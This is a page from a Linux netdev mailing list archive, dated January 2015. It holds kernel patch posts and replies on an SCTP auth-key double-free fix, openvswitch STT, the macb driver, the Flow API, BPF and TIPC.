> with refcount 1 and in case of replacement drops the reference on the old
> sctp_auth_bytes. A key can be set active from user space through setsockopt()
> on the id via sctp_auth_set_active_key(), which iterates through either
> endpoint_shared_keys and in case of an assoc, invokes (one of various places)
> sctp_auth_asoc_init_active_key().
>
> sctp_auth_asoc_init_active_key() computes the actual secret from local's
> and peer's random, hmac and shared key parameters and returns a new key
> directly as sctp_auth_bytes, that is asoc->asoc_shared_key, plus drops
> the reference if there was a previous one. The secret, which where we
> eventually double drop the ref comes from sctp_auth_asoc_set_secret() with
> intitial refcount of 1, which also stays unchanged eventually in
> sctp_assoc_update(). This key is later being used for crypto layer to
> set the key for the hash in crypto_hash_setkey() from sctp_auth_calculate_hmac().
>
> To close the loop: asoc->asoc_shared_key is freshly allocated secret
> material and independant of the sctp_shared_key management keeping track
> of only shared keys in endpoints and assocs. Hence, also commit 4184b2a79a76
> ("net: sctp: fix memory leak in auth key management") is independant of
> this bug here since it concerns a different layer (though same structures
> being used eventually). asoc->asoc_shared_key is reference dropped correctly
> on assoc destruction in sctp_association_free() and when active keys are
> being replaced in sctp_auth_asoc_init_active_key(), it always has a refcount
> of 1. Hence, it's freed prematurely in sctp_assoc_update(). Simple fix is
> to remove that sctp_auth_key_put() from there which fixes these panics.
>
> Fixes: 730fc3d05cd4 ("[SCTP]: Implete SCTP-AUTH parameter processing")
> Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
-vlad
> ---
> net/sctp/associola.c | 1 -
> 1 file changed, 1 deletion(-)
>
> diff --git a/net/sctp/associola.c b/net/sctp/associola.c
> index f791edd..26d06db 100644
> --- a/net/sctp/associola.c
> +++ b/net/sctp/associola.c
> @@ -1182,7 +1182,6 @@ void sctp_assoc_update(struct sctp_association *asoc,
> asoc->peer.peer_hmacs = new->peer.peer_hmacs;
> new->peer.peer_hmacs = NULL;
>
> - sctp_auth_key_put(asoc->asoc_shared_key);
> sctp_auth_asoc_init_active_key(asoc, GFP_ATOMIC);
> }
>
>
^ permalink raw reply
* Re: [PATCH net-next 0/3] openvswitch: Add STT support.
From: Vincent JARDIN @ 2015-01-22 17:51 UTC (permalink / raw)
To: Tom Herbert; +Cc: Jesse Gross, Pravin Shelar, David Miller, Linux Netdev List
In-Reply-To: <CA+mtBx9pnkJBVftqFTK6fcd-toAxsJrvB=drTxWQs_=5s9C0+A@mail.gmail.com>
On 22/01/2015 17:24, Tom Herbert wrote:
> STT is undoubtedly a creative and unique solution I'll give you that,
> but the potential repercussions of allowing this to be widely deployed
> are profound. IMO this needs to be fully explored before it can ever
> be allowed in the kernel. If there has already been discussion on this
> please forward a pointer (I didn't find anything in the IETF mailing
> list archives other than the draft posting announcements), but at the
> minimum these patches warrant a lot of scrutiny.
I share this concern of biased use of TCP, all the critics will be
valid. But anyone can hack TCP (so peer to peer software does or CDN
software does). So, I prefer the let the freedom to the sysadmin to
enable/disable it for their networks. Not having this feature into the
kernel prevent sysadmin from doing it. To be safe, it can be an
experimental feature of the Linux kernel.
Same: LRO/GRO is is bad features: it breaks many times networking (most
IP forwarders must disable it), but it helps for servers. Same for STT
in fact, it has its narrow set of use-cases which are valid.
Best regards,
Vincent
^ permalink raw reply
* [PATCH] net: macb: allow deffered probe of the driver
From: Nicolae Rosia @ 2015-01-22 17:31 UTC (permalink / raw)
To: netdev@vger.kernel.org, nicolas.ferre@atmel.com
The driver is trying to acquire clocks which maybe
are not available yet. Allow the driver to request
deffered probe by providing a probe function and
registering it with module_platform_driver. [1]
This patch is based on 3.19-rc5.
[1] https://lkml.org/lkml/2013/9/23/118
Signed-off-by: Nicolae Rosia <nicolae.rosia@certsign.ro>
---
drivers/net/ethernet/cadence/macb.c | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/drivers/net/ethernet/cadence/macb.c
b/drivers/net/ethernet/cadence/macb.c
index 3767271..4dfcd66 100644
--- a/drivers/net/ethernet/cadence/macb.c
+++ b/drivers/net/ethernet/cadence/macb.c
@@ -2148,7 +2148,7 @@ static void macb_probe_queues(void __iomem *mem,
(*num_queues)++;
}
-static int __init macb_probe(struct platform_device *pdev)
+static int macb_probe(struct platform_device *pdev)
{
struct macb_platform_data *pdata;
struct resource *regs;
@@ -2386,7 +2386,7 @@ err_out:
return err;
}
-static int __exit macb_remove(struct platform_device *pdev)
+static int macb_remove(struct platform_device *pdev)
{
struct net_device *dev;
struct macb *bp;
@@ -2449,7 +2449,8 @@ static int macb_resume(struct device *dev)
static SIMPLE_DEV_PM_OPS(macb_pm_ops, macb_suspend, macb_resume);
static struct platform_driver macb_driver = {
- .remove = __exit_p(macb_remove),
+ .probe = macb_probe,
+ .remove = macb_remove,
.driver = {
.name = "macb",
.of_match_table = of_match_ptr(macb_dt_ids),
@@ -2457,7 +2458,7 @@ static struct platform_driver macb_driver = {
},
};
-module_platform_driver_probe(macb_driver, macb_probe);
+module_platform_driver(macb_driver);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Cadence MACB/GEM Ethernet driver");
--
2.1.0
^ permalink raw reply related
* Re: [net-next PATCH v3 00/12] Flow API
From: Thomas Graf @ 2015-01-22 17:44 UTC (permalink / raw)
To: Pablo Neira Ayuso
Cc: Jamal Hadi Salim, John Fastabend, simon.horman, sfeldma, netdev,
davem, gerlitz.or, andy, ast, Jiri Pirko
In-Reply-To: <20150122164951.GA3417@salvia>
On 01/22/15 at 05:49pm, Pablo Neira Ayuso wrote:
> On Thu, Jan 22, 2015 at 03:37:27PM +0000, Thomas Graf wrote:
> > On 01/22/15 at 10:28am, Jamal Hadi Salim wrote:
> > > On 01/22/15 10:13, Thomas Graf wrote:
> > >
> > > >I don't follow this. John's proposal allows to decide on a case by
> > > >case basis what we want to export. Just like with ethtool or
> > > >RTNETLINK. There is no direct access to hardware. A user can only
> > > >configure what is being exposed by the kernel.
> > > >
> > >
> > > So if i am a vendor with my own driver, I can expose whatever i want.
> >
> > No. We will reject any driver change attempting to do so on this
> > list.
>
> I think those vendors do not want to push those driver changes
> mainstream. They will likely use these new ndo's to fully expose their
> vendor-specific capabilities distributed in proprietary blobs.
You can achieve the exact same thing with an out of tree tc action,
classifier or even a new link type. Nothing prevents an out of tree
driver to register a new rtnetlink link type and do vendor specific
crap.
Out of tree code can abuse any kernel API in any way it wants. Not
sure how much we can do about that.
That said, as we know, vendor specific SDKs for most of the chips in
question here already exist. I'm not sure why a vendor would want to
use this infrastructure (which is subject to constant internal API
changes) to implement vendor specific APIs if that vendor already has
an indepdendent out of tree SDK.
^ permalink raw reply
* Re: [PATCH] samples/bpf: Fix test_maps/bpf_get_next_key() test
From: Alexei Starovoitov @ 2015-01-22 17:32 UTC (permalink / raw)
To: Michael Holzheu
Cc: Alexei Starovoitov, Martin Schwidefsky,
linux-kernel@vger.kernel.org, netdev@vger.kernel.org
On Thu, Jan 22, 2015 at 8:01 AM, Michael Holzheu
<holzheu@linux.vnet.ibm.com> wrote:
> Looks like the "test_maps" test case expects to get the keys in
> the wrong order when iterating over the elements:
>
> test_maps: samples/bpf/test_maps.c:79: test_hashmap_sanity: Assertion
> `bpf_get_next_key(map_fd, &key, &next_key) == 0 && next_key == 2' failed.
> Aborted
>
> Fix this and test for the correct order.
that will break this test on x86...
we need to understand first why the order of two elements
came out different on s390...
Could it be that jhash() produced different hash for the same
values on x86 vs s390 ?
The better fix for the test is probably not to assume AB or BA
order, but accept both.
^ permalink raw reply
* Re: [PATCH net-next 2/2] flow_dissector: add tipc support
From: Eric Dumazet @ 2015-01-22 17:29 UTC (permalink / raw)
To: erik.hugne; +Cc: richard.alpe, netdev, jon.maloy, ying.xue, tipc-discussion
In-Reply-To: <1421943032-29924-2-git-send-email-erik.hugne@ericsson.com>
On Thu, 2015-01-22 at 17:10 +0100, erik.hugne@ericsson.com wrote:
> From: Erik Hugne <erik.hugne@ericsson.com>
>
> The flows are hashed on the sending node address, which allows us
> to spread out the TIPC link processing to RPS enabled cores. There
> is no point to include the destination address in the hash as that
> will always be the same for all inbound links. We have experimented
> with a 3-tuple hash over [srcnode, sport, dport], but this showed to
> give slightly lower performance because of increased lock contention
> when the same link was handled by multiple cores.
>
> Signed-off-by: Ying Xue <ying.xue@windriver.com>
> Signed-off-by: Erik Hugne <erik.hugne@ericsson.com>
> Reviewed-by: Jon Maloy <jon.maloy@ericsson.com>
> ---
> net/core/flow_dissector.c | 14 ++++++++++++++
> 1 file changed, 14 insertions(+)
>
> diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
> index 4508493..beb83d1 100644
> --- a/net/core/flow_dissector.c
> +++ b/net/core/flow_dissector.c
> @@ -178,6 +178,20 @@ ipv6:
> return false;
> }
> }
> + case htons(ETH_P_TIPC): {
> + struct {
> + __be32 pre[3];
> + __be32 srcnode;
> + } *hdr, _hdr;
Is this header defined somewhere in an include file ?
This looks a bit ugly to locally define the format...
^ permalink raw reply
* Re: [PATCH] bpf: Call rcu_read_unlock() before copy_to_user()
From: Alexei Starovoitov @ 2015-01-22 17:27 UTC (permalink / raw)
To: Michael Holzheu
Cc: Alexei Starovoitov, Martin Schwidefsky,
linux-kernel@vger.kernel.org, netdev@vger.kernel.org
On Thu, Jan 22, 2015 at 7:57 AM, Michael Holzheu
<holzheu@linux.vnet.ibm.com> wrote:
> We must not hold locks when calling copy_to_user():
>
> BUG: sleeping function called from invalid context at mm/memory.c:3732
> in_atomic(): 0, irqs_disabled(): 0, pid: 671, name: test_maps
> 1 lock held by test_maps/671:
> #0: (rcu_read_lock){......}, at: [<0000000000264190>] map_lookup_elem+0xe8/0x260
> Preemption disabled at:[<00000000001be3b6>] vprintk_default+0x56/0x68
>
> CPU: 0 PID: 671 Comm: test_maps Not tainted 3.19.0-rc5-00117-g5eb11d6-dirty #424
> 000000001e447bb0 000000001e447c40 0000000000000002 0000000000000000
> 000000001e447ce0 000000001e447c58 000000001e447c58 0000000000115c8a
> 0000000000000000 0000000000c08246 0000000000c27e8a 000000000000000b
> 000000001e447ca0 000000001e447c40 0000000000000000 0000000000000000
> 0000000000000000 0000000000115c8a 000000001e447c40 000000001e447ca0
> Call Trace:
> ([<0000000000115b7e>] show_trace+0x12e/0x150)
> [<0000000000115c40>] show_stack+0xa0/0x100
> [<00000000009b163c>] dump_stack+0x74/0xc8
> [<000000000017424a>] ___might_sleep+0x23a/0x248
> [<00000000002b58e8>] might_fault+0x70/0xe8
> [<0000000000264230>] map_lookup_elem+0x188/0x260
> [<0000000000264716>] SyS_bpf+0x20e/0x840
> [<00000000009bbe3a>] system_call+0xd6/0x24c
> [<000003fffd15f566>] 0x3fffd15f566
> 1 lock held by test_maps/671:
> #0: (rcu_read_lock){......}, at: [<0000000000264190>] map_lookup_elem+0xe8/0x260
>
> So call rcu_read_unlock() before copy_to_user(). We can
> release the lock earlier because it is not needed for copy_to_user().
we cannot move the rcu unlock this way, since it protects the value.
So we need to copy the value while still under rcu.
I'm puzzled how I missed this warning.
I guess you have CONFIG_PREEMPT_RCU=y ?
and if (in_atomic()) return; as part of might_fault() hid it.
^ permalink raw reply
* [PATCH net] net: sctp: fix slab corruption from use after free on INIT collisions
From: Daniel Borkmann @ 2015-01-22 17:26 UTC (permalink / raw)
To: davem; +Cc: vyasevich, netdev, linux-sctp
When hitting an INIT collision case during the 4WHS with AUTH enabled, as
already described in detail in commit 1be9a950c646 ("net: sctp: inherit
auth_capable on INIT collisions"), it can happen that we occasionally
still remotely trigger the following panic on server side which seems to
have been uncovered after the fix from commit 1be9a950c646 ...
[ 533.876389] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 533.913657] IP: [<ffffffff811ac385>] __kmalloc+0x95/0x230
[ 533.940559] PGD 5030f2067 PUD 0
[ 533.957104] Oops: 0000 [#1] SMP
[ 533.974283] Modules linked in: sctp mlx4_en [...]
[ 534.939704] Call Trace:
[ 534.951833] [<ffffffff81294e30>] ? crypto_init_shash_ops+0x60/0xf0
[ 534.984213] [<ffffffff81294e30>] crypto_init_shash_ops+0x60/0xf0
[ 535.015025] [<ffffffff8128c8ed>] __crypto_alloc_tfm+0x6d/0x170
[ 535.045661] [<ffffffff8128d12c>] crypto_alloc_base+0x4c/0xb0
[ 535.074593] [<ffffffff8160bd42>] ? _raw_spin_lock_bh+0x12/0x50
[ 535.105239] [<ffffffffa0418c11>] sctp_inet_listen+0x161/0x1e0 [sctp]
[ 535.138606] [<ffffffff814e43bd>] SyS_listen+0x9d/0xb0
[ 535.166848] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
... or depending on the the application, for example this one:
[ 1370.026490] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 1370.026506] IP: [<ffffffff811ab455>] kmem_cache_alloc+0x75/0x1d0
[ 1370.054568] PGD 633c94067 PUD 0
[ 1370.070446] Oops: 0000 [#1] SMP
[ 1370.085010] Modules linked in: sctp kvm_amd kvm [...]
[ 1370.963431] Call Trace:
[ 1370.974632] [<ffffffff8120f7cf>] ? SyS_epoll_ctl+0x53f/0x960
[ 1371.000863] [<ffffffff8120f7cf>] SyS_epoll_ctl+0x53f/0x960
[ 1371.027154] [<ffffffff812100d3>] ? anon_inode_getfile+0xd3/0x170
[ 1371.054679] [<ffffffff811e3d67>] ? __alloc_fd+0xa7/0x130
[ 1371.080183] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
With slab debugging enabled, we can see that the poison has been overwritten:
[ 669.826368] BUG kmalloc-128 (Tainted: G W ): Poison overwritten
[ 669.826385] INFO: 0xffff880228b32e50-0xffff880228b32e50. First byte 0x6a instead of 0x6b
[ 669.826414] INFO: Allocated in sctp_auth_create_key+0x23/0x50 [sctp] age=3 cpu=0 pid=18494
[ 669.826424] __slab_alloc+0x4bf/0x566
[ 669.826433] __kmalloc+0x280/0x310
[ 669.826453] sctp_auth_create_key+0x23/0x50 [sctp]
[ 669.826471] sctp_auth_asoc_create_secret+0xcb/0x1e0 [sctp]
[ 669.826488] sctp_auth_asoc_init_active_key+0x68/0xa0 [sctp]
[ 669.826505] sctp_do_sm+0x29d/0x17c0 [sctp] [...]
[ 669.826629] INFO: Freed in kzfree+0x31/0x40 age=1 cpu=0 pid=18494
[ 669.826635] __slab_free+0x39/0x2a8
[ 669.826643] kfree+0x1d6/0x230
[ 669.826650] kzfree+0x31/0x40
[ 669.826666] sctp_auth_key_put+0x19/0x20 [sctp]
[ 669.826681] sctp_assoc_update+0x1ee/0x2d0 [sctp]
[ 669.826695] sctp_do_sm+0x674/0x17c0 [sctp]
Since this only triggers in some collision-cases with AUTH, the problem at
heart is that sctp_auth_key_put() on asoc->asoc_shared_key is called twice
when having refcnt 1, once directly in sctp_assoc_update() and yet again
from within sctp_auth_asoc_init_active_key() via sctp_assoc_update() on
the already kzfree'd memory, which is also consistent with the observation
of the poison decrease from 0x6b to 0x6a (note: the overwrite is detected
at a later point in time when poison is checked on new allocation).
Reference counting of auth keys revisited:
Shared keys for AUTH chunks are being stored in endpoints and associations
in endpoint_shared_keys list. On endpoint creation, a null key is being
added; on association creation, all endpoint shared keys are being cached
and thus cloned over to the association. struct sctp_shared_key only holds
a pointer to the actual key bytes, that is, struct sctp_auth_bytes which
keeps track of users internally through refcounting. Naturally, on assoc
or enpoint destruction, sctp_shared_key are being destroyed directly and
the reference on sctp_auth_bytes dropped.
User space can add keys to either list via setsockopt(2) through struct
sctp_authkey and by passing that to sctp_auth_set_key() which replaces or
adds a new auth key. There, sctp_auth_create_key() creates a new sctp_auth_bytes
with refcount 1 and in case of replacement drops the reference on the old
sctp_auth_bytes. A key can be set active from user space through setsockopt()
on the id via sctp_auth_set_active_key(), which iterates through either
endpoint_shared_keys and in case of an assoc, invokes (one of various places)
sctp_auth_asoc_init_active_key().
sctp_auth_asoc_init_active_key() computes the actual secret from local's
and peer's random, hmac and shared key parameters and returns a new key
directly as sctp_auth_bytes, that is asoc->asoc_shared_key, plus drops
the reference if there was a previous one. The secret, which where we
eventually double drop the ref comes from sctp_auth_asoc_set_secret() with
intitial refcount of 1, which also stays unchanged eventually in
sctp_assoc_update(). This key is later being used for crypto layer to
set the key for the hash in crypto_hash_setkey() from sctp_auth_calculate_hmac().
To close the loop: asoc->asoc_shared_key is freshly allocated secret
material and independant of the sctp_shared_key management keeping track
of only shared keys in endpoints and assocs. Hence, also commit 4184b2a79a76
("net: sctp: fix memory leak in auth key management") is independant of
this bug here since it concerns a different layer (though same structures
being used eventually). asoc->asoc_shared_key is reference dropped correctly
on assoc destruction in sctp_association_free() and when active keys are
being replaced in sctp_auth_asoc_init_active_key(), it always has a refcount
of 1. Hence, it's freed prematurely in sctp_assoc_update(). Simple fix is
to remove that sctp_auth_key_put() from there which fixes these panics.
Fixes: 730fc3d05cd4 ("[SCTP]: Implete SCTP-AUTH parameter processing")
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
---
net/sctp/associola.c | 1 -
1 file changed, 1 deletion(-)
diff --git a/net/sctp/associola.c b/net/sctp/associola.c
index f791edd..26d06db 100644
--- a/net/sctp/associola.c
+++ b/net/sctp/associola.c
@@ -1182,7 +1182,6 @@ void sctp_assoc_update(struct sctp_association *asoc,
asoc->peer.peer_hmacs = new->peer.peer_hmacs;
new->peer.peer_hmacs = NULL;
- sctp_auth_key_put(asoc->asoc_shared_key);
sctp_auth_asoc_init_active_key(asoc, GFP_ATOMIC);
}
--
1.7.11.7
^ permalink raw reply related
* Re: [PATCH net-next 1/2] tipc: fix excessive network event logging
From: Joe Perches @ 2015-01-22 17:24 UTC (permalink / raw)
To: erik.hugne; +Cc: richard.alpe, netdev, jon.maloy, ying.xue, tipc-discussion
In-Reply-To: <1421943032-29924-1-git-send-email-erik.hugne@ericsson.com>
On Thu, 2015-01-22 at 17:10 +0100, erik.hugne@ericsson.com wrote:
> From: Erik Hugne <erik.hugne@ericsson.com>
>
> If a large number of namespaces is spawned on a node and TIPC is
> enabled in each of these, the excessive printk tracing of network
> events will cause the system to grind down to a near halt.
> The traces are still of debug value, so instead of removing them
> completely we fix it by changing the link state and node availability
> logging debug traces.
Maybe some of these should be net_<level>_ratelimited(fmt, ...)
> diff --git a/net/tipc/link.c b/net/tipc/link.c
[]
> @@ -588,8 +588,8 @@ static void link_state_event(struct tipc_link *l_ptr, unsigned int event)
> l_ptr->fsm_msg_cnt++;
> link_set_timer(l_ptr, cont_intv / 4);
> } else { /* Link has failed */
> - pr_warn("%s<%s>, peer not responding\n",
> - link_rst_msg, l_ptr->name);
Like this one.
> + pr_debug("%s<%s>, peer not responding\n",
> + link_rst_msg, l_ptr->name);
> tipc_link_reset(l_ptr);
> l_ptr->state = RESET_UNKNOWN;
> l_ptr->fsm_msg_cnt = 0;
> @@ -380,8 +380,8 @@ static void node_lost_contact(struct tipc_node *n_ptr)
> char addr_string[16];
> u32 i;
>
> - pr_info("Lost contact with %s\n",
> - tipc_addr_string_fill(addr_string, n_ptr->addr));
> + pr_debug("Lost contact with %s\n",
> + tipc_addr_string_fill(addr_string, n_ptr->addr));
>
> /* Flush broadcast link info associated with lost node */
> if (n_ptr->bclink.recv_permitted) {
And maybe this one too.
^ permalink raw reply
* Re: [net-next PATCH v3 00/12] Flow API
From: John Fastabend @ 2015-01-22 17:10 UTC (permalink / raw)
To: Pablo Neira Ayuso
Cc: Thomas Graf, Jamal Hadi Salim, simon.horman, sfeldma, netdev,
davem, gerlitz.or, andy, ast, Jiri Pirko
In-Reply-To: <20150122164951.GA3417@salvia>
On 01/22/2015 08:49 AM, Pablo Neira Ayuso wrote:
> On Thu, Jan 22, 2015 at 03:37:27PM +0000, Thomas Graf wrote:
>> On 01/22/15 at 10:28am, Jamal Hadi Salim wrote:
>>> On 01/22/15 10:13, Thomas Graf wrote:
>>>
>>>> I don't follow this. John's proposal allows to decide on a case by
>>>> case basis what we want to export. Just like with ethtool or
>>>> RTNETLINK. There is no direct access to hardware. A user can only
>>>> configure what is being exposed by the kernel.
>>>>
>>>
>>> So if i am a vendor with my own driver, I can expose whatever i want.
>>
>> No. We will reject any driver change attempting to do so on this
>> list.
>
> I think those vendors do not want to push those driver changes
> mainstream. They will likely use these new ndo's to fully expose their
> vendor-specific capabilities distributed in proprietary blobs.
>
> I remember to have seen one ugly patch for netfilter that added
> several hook functions (not netfilter hooks) at different positions of
> the NAT code, the goal was to offload NAT through hardware. I was told
> the code that was using those ad-hoc hooks was distributed in a binary
> blob.
>
>> This is the whole point of this: Coming up with a model that allows
>> to describe capabilities and offer flow programming capabilities
>> in a Vendor neutral way. A "push_vlan" or "pop_vlan" action will work
>> with any driver that supports it.
>
> Right, we need an abstraction for actions too, and the infrastructure
> should not provide any means to circunvent and expose vendor specific
> details.
>
I'm not sure what a vendor specific detail is in the API now?
The API provides a mechanism to define the headers you support in a
vendor neutral way. Perhaps vendor X may be the only hardware to
support the packet type but the packets are not really vendor specific
if we have the packet layout we can generate code to create the packets
if we care to in software and find it useful.
Maybe the issue is the actions look like UIDs without any specification
as to what they do? The concern being as a vendor I could create an
action and call it my_vendor_specific_action and if I never tell anyone
how to use it then we are stuck.
I can add a set of specifier attributes to the get_action call that
describes actions using basic primitives to resolve this specific issue.
Actions should either 'set' fields, 'get' fields, 'dec' fields, 'inc'
fields, etc. Then you specify an action by providing the list of
operations it performs. So set_group_id is simply
'set_field uid=group_id_metadata'
More complicated actions exist like route() and such which will be a
list of operations that may set multiple fields in a single atomic step.
The table API also seems vendor neutral to me. I'm not sure what
specific details would be vendor specific here either.
.John
--
John Fastabend Intel Corporation
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox